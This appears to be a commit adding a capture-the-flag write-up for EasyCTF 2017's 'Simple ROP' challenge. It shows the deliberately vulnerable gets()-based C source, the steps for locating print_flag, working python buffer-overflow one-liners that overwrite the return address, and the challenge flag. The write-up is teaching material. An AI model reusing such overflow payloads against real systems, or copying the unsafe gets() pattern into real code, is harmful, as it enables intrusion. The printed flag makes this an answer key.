create simple rop writeup

Author: VoidMercy

binary-exploitation/simple-rop-120-points

@@ -0,0 +1,61 @@
+# Simple ROP - 120 Points
+
+Read flag.txt
+
+[Source](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/simple-rop/simple-rop.c)
+
+[Binary](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/simple-rop/simple-rop?raw=true)
+
+### Solution
+
+###### Writeup by VoidMercy from phsst
+
+We were given a binary and it's source code.
+
+```
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+
+void print_flag();
+void what_did_you_say();
+
+int main(int argc, char* argv[])
+{
+    gid_t gid = getegid();
+    setresgid(gid, gid, gid);
+    what_did_you_say();
+    return 0;
+}
+
+void print_flag()
+{
+    system("cat flag.txt");
+}
+
+void what_did_you_say()
+{
+    char buff[64];
+    gets(buff);
+    printf("You said: %s\n", buff);
+}
+```
+
+As the problem name suggests, this is a problem that uses ROP. We can see that we have to call the function print_flag() to get the flag, so we first get the address of this function with:
+
+>objdump -d simplerop | grep "print_flag"
+
+We find the address of print_flag to be: 0x804851a
+
+Then, we have to find out the number of characters until we gain control of eip through the return address. Afterwards we append the address of print_flag() in little endian order (reversed order in chunks of 2 bytes), then pipe the input through python (to print the non printable ascii characters).
+
+```
+python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS
+
+python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS
+```
+
+## Flag
+
+>easyctf{r0p_7o_v1ct0ry}